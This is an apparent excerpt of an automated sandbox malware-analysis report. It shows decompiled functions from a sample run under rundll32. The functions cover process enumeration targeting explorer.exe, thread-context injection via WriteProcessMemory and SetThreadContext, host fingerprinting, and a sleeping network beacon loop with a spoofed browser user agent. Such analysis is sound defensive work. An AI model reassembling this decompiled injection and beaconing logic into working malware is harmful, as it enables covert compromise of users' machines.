                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$EnumOpenProcessProcesseslstrcpy
                                                  • String ID: explorer.exe
                                                  • API String ID: 1774016706-3187896405
                                                  • Opcode ID: 1e22c196e5af4817aae5281c9ebdd841293c792fbafeeec61f1ea2f7af86c742
                                                  • Instruction ID: 5d7ab605a3f5b6af894d0376a8235643c92bce58605dca09c2802ceaca8b4972
                                                  • Opcode Fuzzy Hash: 1e22c196e5af4817aae5281c9ebdd841293c792fbafeeec61f1ea2f7af86c742
                                                  • Instruction Fuzzy Hash: 221148B5900208ABCB15DFA8DD45BDEB7F8AB49300F004594F609DF241D674EA848B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342B80, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 287 342b80-342b9b call 342b40 290 342ba4-342bb6 call 342c40 287->290 291 342b9d-342b9f 287->291 295 342bbd-342bdc call 343270 290->295 296 342bb8-342bbb 290->296 292 342c31-342c34 291->292 299 342bde-342bf9 call 3437e0 295->299 300 342c08-342c0c 295->300 296->292 299->300 305 342bfb-342c05 GetProcessId 299->305 302 342c0e-342c14 TerminateProcess 300->302 303 342c1a-342c2e CloseHandle * 2 300->303 302->303 303->292 305->300
                                                  C-Code - Quality: 100%
                                                  			E00342B80(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t24;
				void* _t27;
				void* _t34;
				long _t36;

				_v12 = 0xffffffff;
				if(E00342B40(__ecx, _a4) != 0) {
					_t24 = E00342C40( &_v8,  &_v16); // executed
					if(_t24 != 0) {
						_t27 = E00343270(_v8, _a4, _a8,  &_v24,  &_v20); // executed
						if(_t27 == 1) {
							_t34 = E003437E0(_v8, _v16, _v24, _v20); // executed
							if(_t34 == 1) {
								_t36 = GetProcessId(_v8); // executed
								_v12 = _t36;
							}
						}
						if(_v12 == 0xffffffff) {
							TerminateProcess(_v8, 0);
						}
						CloseHandle(_v16);
						CloseHandle(_v8);
						return _v12;
					}
					return _v12;
				}
				return 0;
			}












                                                  0x00342b86
                                                  0x00342b9b
                                                  0x00342bac
                                                  0x00342bb6
                                                  0x00342bd1
                                                  0x00342bdc
                                                  0x00342bee
                                                  0x00342bf9
                                                  0x00342bff
                                                  0x00342c05
                                                  0x00342c05
                                                  0x00342bf9
                                                  0x00342c0c
                                                  0x00342c14
                                                  0x00342c14
                                                  0x00342c1e
                                                  0x00342c28
                                                  0x00000000
                                                  0x00342c2e
                                                  0x00000000
                                                  0x00342bb8
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb019a9e6d45ddcdf21ecd0fb5972519f2c7fc314f57fc8786e0aa0995d53cbd
                                                  • Instruction ID: 8183b429782d0d9983a8bcb91a2684c9cd570192b1628bf401a8bae2c40da40f
                                                  • Opcode Fuzzy Hash: bb019a9e6d45ddcdf21ecd0fb5972519f2c7fc314f57fc8786e0aa0995d53cbd
                                                  • Instruction Fuzzy Hash: B2211FBAD00108BBCB15DBE4D985DAFB7BCAB48310F508654F915EB241E630FA009B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342F30, Relevance: 6.1, APIs: 4, Instructions: 58stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 306 342f30-342f51 OpenProcess 307 342f57-342f7d K32GetProcessImageFileNameA CloseHandle 306->307 308 342feb 306->308 307->308 310 342f7f-342f8d 307->310 309 342fed-342ff0 308->309 311 342f98-342f9e 310->311 312 342fd0-342fd4 311->312 313 342fa0-342fae 311->313 312->308 314 342fd6-342fe9 lstrcpyA 312->314 315 342fb0-342fba 313->315 316 342fbd-342fca 313->316 314->309 315->316 317 342fcc 316->317 318 342fce 316->318 317->312 318->311
                                                  C-Code - Quality: 85%
                                                  			E00342F30(long _a4, CHAR* _a8) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				char _v280;
				void* _t29;
				void* _t48;

				_t29 = OpenProcess(0x400, 0, _a4);
				_v12 = _t29;
				if(_v12 == 0) {
					L12:
					return 0;
				}
				_push(0x104);
				_push( &_v280);
				_push(_v12); // executed
				L00343BE3(); // executed
				_v20 = _t29;
				CloseHandle(_v12); // executed
				if(_v20 <= 0) {
					goto L12;
				}
				_v16 = 0;
				_v8 = 0;
				while(_v8 < _v20) {
					if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
						_v16 = _t48 + _v8 - 0x113;
					}
					if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
						_v8 = _v8 + 1;
						continue;
					} else {
						break;
					}
				}
				if(_v16 == 0) {
					goto L12;
				}
				lstrcpyA(_a8, _v16);
				return 1;
			}










                                                  0x00342f44
                                                  0x00342f4a
                                                  0x00342f51
                                                  0x00342feb
                                                  0x00000000
                                                  0x00342feb
                                                  0x00342f57
                                                  0x00342f62
                                                  0x00342f66
                                                  0x00342f67
                                                  0x00342f6c
                                                  0x00342f73
                                                  0x00342f7d
                                                  0x00000000
                                                  0x00000000
                                                  0x00342f7f
                                                  0x00342f86
                                                  0x00342f98
                                                  0x00342fae
                                                  0x00342fba
                                                  0x00342fba
                                                  0x00342fca
                                                  0x00342f95
                                                  0x00000000
                                                  0x00342fcc
                                                  0x00000000
                                                  0x00342fcc
                                                  0x00342fca
                                                  0x00342fd4
                                                  0x00000000
                                                  0x00000000
                                                  0x00342fde
                                                  0x00000000

                                                  APIs
                                                  • OpenProcess.KERNEL32(00000400,00000000,00342E03), ref: 00342F44
                                                  • K32GetProcessImageFileNameA.KERNEL32 ref: 00342F67
                                                  • CloseHandle.KERNEL32(00000000), ref: 00342F73
                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 00342FDE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseFileHandleImageNameOpenlstrcpy
                                                  • String ID:
                                                  • API String ID: 2420205050-0
                                                  • Opcode ID: db0eec48c8561ac4fd5e40b8caf8ca870bdf6baa992dd267b832af0a1cd2dcd1
                                                  • Instruction ID: db84e89580a781198b59f224c71a1fe25189c0e3980fa8bea8e0befcdcf4211d
                                                  • Opcode Fuzzy Hash: db0eec48c8561ac4fd5e40b8caf8ca870bdf6baa992dd267b832af0a1cd2dcd1
                                                  • Instruction Fuzzy Hash: 4D211D74A0410CEBCB16CF94D985BEEB7F9BB44305FA081A9F615AB280C7746A48DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003437E0, Relevance: 6.1, APIs: 4, Instructions: 51threadinjectionCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E003437E0(void* _a4, void* _a8, void _a12, intOrPtr _a16) {
				struct _CONTEXT _v720;
				int _t17;
				int _t19;

				_v720.ContextFlags = 0x10002;
				E003414A0( &(_v720.Dr0), 0, 0x2c8);
				if(GetThreadContext(_a8,  &_v720) != 0) {
					_t17 = WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0); // executed
					if(_t17 != 0) {
						_v720.Eax = _a16;
						_t19 = SetThreadContext(_a8,  &_v720); // executed
						if(_t19 != 0) {
							ResumeThread(_a8); // executed
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}






                                                  0x003437e9
                                                  0x00343801
                                                  0x0034381c
                                                  0x00343838
                                                  0x00343840
                                                  0x00343849
                                                  0x0034385a
                                                  0x00343862
                                                  0x0034386c
                                                  0x00000000
                                                  0x00343872
                                                  0x00000000
                                                  0x00343864
                                                  0x00000000
                                                  0x00343842
                                                  0x00000000

                                                  APIs
                                                  • GetThreadContext.KERNEL32(00341ECF,00010002), ref: 00343814
                                                  • WriteProcessMemory.KERNELBASE(?,?,00500000,00000004,00000000), ref: 00343838
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ContextMemoryProcessThreadWrite
                                                  • String ID:
                                                  • API String ID: 2099319263-0
                                                  • Opcode ID: 986645319e92069ba7ff468ab9c3761ecc9cd9c622071ba54264c80e44fc7e2a
                                                  • Instruction ID: b0d0bae983fec01b42c8a2b0c496b6f51c1fe58b2b59b85b5ffc787356b10c9c
                                                  • Opcode Fuzzy Hash: 986645319e92069ba7ff468ab9c3761ecc9cd9c622071ba54264c80e44fc7e2a
                                                  • Instruction Fuzzy Hash: B1116175605109ABEB11CF64DC49FAEB3FCAB18744F108568FA09DB140EB30EA54CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00341C70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E00341C70(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t61;
				void* _t62;

				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				_v12 = 0x8000;
				_t33 = E00341390(_v12); // executed
				_t62 = _t61 + 4;
				_v16 = _t33;
				_v8 = _v16;
				_t34 = _v8;
				__imp__GetAdaptersAddresses(2, 0, 0, _t34,  &_v12); // executed
				_v20 = _t34;
				if(_v20 == 0) {
					while(_v8 != 0) {
						_t11 =  &_v36; // 0x342645
						E003414A0(_t11, 0, 8);
						_t15 =  &_v36; // 0x342645
						E00341450(_t15, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34)));
						_t62 = _t62 + 0x18;
						_t17 =  &_v36; // 0x342645
						_v28 = _v28 ^  *_t17;
						_v24 = _v24 ^ _v32;
						_v8 =  *((intOrPtr*)(_v8 + 8));
					}
				}
				E003413D0(_v16);
				_t36 = E00342490(); // executed
				_v44 = _t36;
				_v40 = 0;
				return E00341400(_v44, 0x20, _v40) ^ _v28;
			}


















                                                  0x00341c76
                                                  0x00341c79
                                                  0x00341c7e
                                                  0x00341c89
                                                  0x00341c8e
                                                  0x00341c91
                                                  0x00341c97
                                                  0x00341c9e
                                                  0x00341ca8
                                                  0x00341cae
                                                  0x00341cb5
                                                  0x00341cb7
                                                  0x00341cc1
                                                  0x00341cc5
                                                  0x00341cdb
                                                  0x00341cdf
                                                  0x00341ce4
                                                  0x00341cea
                                                  0x00341cf3
                                                  0x00341cf6
                                                  0x00341cff
                                                  0x00341cff
                                                  0x00341cb7
                                                  0x00341d08
                                                  0x00341d10
                                                  0x00341d17
                                                  0x00341d1a
                                                  0x00341d33

                                                  APIs
                                                    • Part of subcall function 00341390: GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                    • Part of subcall function 00341390: RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,00008000), ref: 00341CA8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AdaptersAddressesAllocateProcess
                                                  • String ID: E&4$Mj<p
                                                  • API String ID: 2964925633-206575084
                                                  • Opcode ID: 39d03d8f16274d053992d4817779c580933d78844dea88f0b740e6db08b62e90
                                                  • Instruction ID: c2f947a769767725f8e2e9e20db7fcd7d3afb9233aee0f60ee50e8dc8b84b742
                                                  • Opcode Fuzzy Hash: 39d03d8f16274d053992d4817779c580933d78844dea88f0b740e6db08b62e90
                                                  • Instruction Fuzzy Hash: F821FBB5D00209ABDB04DFE5D982BEEBBF5BF4C304F104159E905BB341E6706A84CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342E90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 83%
                                                  			E00342E90(CHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				char _v276;
				char _v4372;
				signed int _t23;
				void* _t26;
				int _t29;
				void* _t40;
				void* _t41;

				E00341420(0x1110);
				_t23 =  &_v12;
				_push(_t23);
				_push(0x1000);
				_push( &_v4372); // executed
				L00343BDD(); // executed
				if(_t23 != 0) {
					_v16 = _v12 >> 2;
					_v8 = 0;
					while(_v8 < _v16) {
						_t26 = E00342F30( *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)),  &_v276); // executed
						_t41 = _t41 + 8;
						if(_t26 == 0) {
							L8:
							_t23 = _v8 + 1;
							_v8 = _t23;
							continue;
						}
						_t29 = lstrcmpiA( &_v276, _a4); // executed
						if(_t29 != 0) {
							goto L8;
						}
						return  *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110));
					}
					return _t23 | 0xffffffff;
				}
				return _t23 | 0xffffffff;
			}













                                                  0x00342e98
                                                  0x00342e9d
                                                  0x00342ea0
                                                  0x00342ea1
                                                  0x00342eac
                                                  0x00342ead
                                                  0x00342eb4
                                                  0x00342ec1
                                                  0x00342ec4
                                                  0x00342ed6
                                                  0x00342ef0
                                                  0x00342ef5
                                                  0x00342efa
                                                  0x00342f1d
                                                  0x00342ed0
                                                  0x00342ed3
                                                  0x00000000
                                                  0x00342ed3
                                                  0x00342f07
                                                  0x00342f0f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00342f14
                                                  0x00000000
                                                  0x00342f1f
                                                  0x00000000

                                                  APIs
                                                  • K32EnumProcesses.KERNEL32(?,00001000,00342E03), ref: 00342EAD
                                                  • lstrcmpi.KERNEL32(?,00342E03,?,?,00342E03), ref: 00342F07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumProcesseslstrcmpi
                                                  • String ID: .>ov
                                                  • API String ID: 1246086236-341798122
                                                  • Opcode ID: 48c58026700e90da35ae5bc2acfccc5979777038dcb11cf0d149490fec32d845
                                                  • Instruction ID: 6aede821755dd8248d97eefc7a2b5a23330ebd0656fd4246730577fa3f90a5f9
                                                  • Opcode Fuzzy Hash: 48c58026700e90da35ae5bc2acfccc5979777038dcb11cf0d149490fec32d845
                                                  • Instruction Fuzzy Hash: 7D115E70D10108EBCB16CF94D841AEEB3F8BF48344F904699FA25AB280E770BE84DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003424F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14networkCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E003424F0() {
				void* _t1;
				void* _t2;

				if( *0x347270 == 0) {
					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
					 *0x347270 = _t2;
				}
				_t1 =  *0x347270; // 0xcc0004
				return _t1;
			}





                                                  0x003424fa
                                                  0x00342509
                                                  0x0034250f
                                                  0x0034250f
                                                  0x00342514
                                                  0x0034251a

                                                  APIs
                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 00342509
                                                  Strings
                                                  • Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 00342504
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InternetOpen
                                                  • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  • API String ID: 2038078732-3333256863
                                                  • Opcode ID: b37671659e40dd79d3900090ae7edc457e872edc5f19f8e91bc948d08c1cba1a
                                                  • Instruction ID: 980a53fe87b5513944cb65ce08002127789f40ff1ef5e69625c357952baf2b64
                                                  • Opcode Fuzzy Hash: b37671659e40dd79d3900090ae7edc457e872edc5f19f8e91bc948d08c1cba1a
                                                  • Instruction Fuzzy Hash: D2D01238684B04ABEB328BA4AD06F9173FCB346B14F610821F3086E1E0CFF07459C659
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342490, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00342490() {
				int _v8;
				long _v12;
				char _v272;
				int _t13;
				void* _t18;

				_v8 = GetWindowsDirectoryA( &_v272, 0x104);
				if(_v8 == 0) {
					L3:
					return 0;
				}
				 *((char*)(_t18 + 0xfffffffffffffef7)) = 0;
				_t13 = GetVolumeInformationA( &_v272, 0, 0,  &_v12, 0, 0, 0, 0); // executed
				if(_t13 == 0) {
					goto L3;
				}
				return _v12;
			}








                                                  0x003424ab
                                                  0x003424b2
                                                  0x003424ea
                                                  0x00000000
                                                  0x003424ea
                                                  0x003424bc
                                                  0x003424db
                                                  0x003424e3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003424A5
                                                  • GetVolumeInformationA.KERNEL32 ref: 003424DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DirectoryInformationVolumeWindows
                                                  • String ID:
                                                  • API String ID: 3487004747-0
                                                  • Opcode ID: 9e362a1582548df2d40ba2b057a4271798b9627ea95a282cb32e3d2a564e83b1
                                                  • Instruction ID: 130708db4ce018dc65e7fe28149d2e6481a748d656ca07c5cec392ac1937615b
                                                  • Opcode Fuzzy Hash: 9e362a1582548df2d40ba2b057a4271798b9627ea95a282cb32e3d2a564e83b1
                                                  • Instruction Fuzzy Hash: 51F05434A40308AAE735DB64DC15BD9B7ACD701700F5041A4B645EA1C0DBF47A84CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00351C20, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,0034BF13,00000001,?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 00351C31
                                                  • HeapDestroy.KERNEL32(?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 00351C67
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$CreateDestroy
                                                  • String ID:
                                                  • API String ID: 3296620671-0
                                                  • Opcode ID: 9f991b191f234ab60ec9935b0de80769faccf94128bed65503d3ed9ebffa9488
                                                  • Instruction ID: 98f2b391cdf6d70962599caf41fc3543b8d94e093a8393dd4eed1a4dd81d2ea4
                                                  • Opcode Fuzzy Hash: 9f991b191f234ab60ec9935b0de80769faccf94128bed65503d3ed9ebffa9488
                                                  • Instruction Fuzzy Hash: 34E06DB1A94312EAEB175B30AE0DB2637E8A740387F00842AF841C91B0FBB48548AE00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00341870, Relevance: 2.6, APIs: 2, Instructions: 85sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E00341870(void* __eflags) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t32;
				intOrPtr _t35;
				void* _t38;
				void* _t40;
				void* _t52;
				void* _t55;

				_v12 = 0x100000;
				_t28 = E00341390(_v12); // executed
				_v20 = _t28;
				_t29 = E00341390(_v12); // executed
				_v24 = _t29;
				_t30 = E00341390(0x1000); // executed
				_t55 = _t52 + 0xc;
				_v8 = _t30;
				_v32 = 1;
				while(1) {
					_t58 = _v32 - 1;
					if(_v32 != 1) {
						break;
					}
					_t32 = E00341AA0( &_v36, _t58, _v20, _v12,  &_v36); // executed
					_t55 = _t55 + 0xc;
					if(_t32 != 1) {
						L12:
						Sleep(0xea60); // executed
						_t30 = E003415C0();
						Sleep(0xea60);
						continue;
					}
					_t35 = E00341560(_v20 + 4, _v24);
					_t55 = _t55 + 8;
					_v36 = _t35;
					_v16 = _v24;
					while(1 != 0) {
						_v16 = E003417B0(_v16, _v16, _v8);
						_t38 = E003427B0(_v16, _v8);
						_t55 = _t55 + 0xc;
						if(_t38 == 1) {
							_v28 = 0;
							_t46 = _v8;
							_t40 = E00341630(_v8, _v8,  &_v28); // executed
							_t55 = _t55 + 8;
							if(_t40 == 1 && _v28 == 0) {
								E003414E0(_t46, _v8);
								_t55 = _t55 + 4;
							}
						}
						if(_v16 != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L12;
				}
				return _t30;
			}




















                                                  0x00341876
                                                  0x00341881
                                                  0x00341889
                                                  0x00341890
                                                  0x00341898
                                                  0x003418a0
                                                  0x003418a5
                                                  0x003418a8
                                                  0x003418ab
                                                  0x003418b2
                                                  0x003418b2
                                                  0x003418b6
                                                  0x00000000
                                                  0x00000000
                                                  0x003418c8
                                                  0x003418cd
                                                  0x003418d3
                                                  0x0034195a
                                                  0x0034195f
                                                  0x00341965
                                                  0x0034196f
                                                  0x00000000
                                                  0x0034196f
                                                  0x003418e4
                                                  0x003418e9
                                                  0x003418ec
                                                  0x003418f2
                                                  0x003418f5
                                                  0x0034190e
                                                  0x00341915
                                                  0x0034191a
                                                  0x00341920
                                                  0x00341922
                                                  0x0034192d
                                                  0x00341931
                                                  0x00341936
                                                  0x0034193c
                                                  0x00341948
                                                  0x0034194d
                                                  0x0034194d
                                                  0x0034193c
                                                  0x00341954
                                                  0x00000000
                                                  0x00341956
                                                  0x00000000
                                                  0x00341956
                                                  0x00341954
                                                  0x00000000
                                                  0x003418f5
                                                  0x0034197d

                                                  APIs
                                                    • Part of subcall function 00341390: GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                    • Part of subcall function 00341390: RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                    • Part of subcall function 00341AA0: GetVersion.KERNEL32(?,003418CD,?,00100000,?), ref: 00341AAD
                                                    • Part of subcall function 00341AA0: wsprintfA.USER32 ref: 00341B5E
                                                  • Sleep.KERNELBASE(0000EA60), ref: 0034195F
                                                  • Sleep.KERNEL32(0000EA60), ref: 0034196F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HeapSleep$AllocateProcessVersionwsprintf
                                                  • String ID:
                                                  • API String ID: 1739176888-0
                                                  • Opcode ID: 4eea1954665144cf9772b4886e0889e093941126fcb3dc5ababea3d725d3a8ae
                                                  • Instruction ID: 1f761668352854c31781814a2fe1c318eeb742a595d271229a22df988b190733
                                                  • Opcode Fuzzy Hash: 4eea1954665144cf9772b4886e0889e093941126fcb3dc5ababea3d725d3a8ae
                                                  • Instruction Fuzzy Hash: A23193B6D00609EBDF11DFD4D851BAEB7F8AF48304F144428E519BE241E735BA848B92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003413D0, Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E003413D0(void* _a4) {
				void* _t2;
				int _t4;
				void* _t5;

				if( *0x34715c != 0) {
					_t5 =  *0x34715c; // 0x4e0000
					_t4 = HeapFree(_t5, 0, _a4); // executed
					return _t4;
				}
				return _t2;
			}






                                                  0x003413da
                                                  0x003413e2
                                                  0x003413e9
                                                  0x00000000
                                                  0x003413e9
                                                  0x003413f0

                                                  APIs
                                                  • HeapFree.KERNEL32(004E0000,00000000,00341D0D), ref: 003413E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
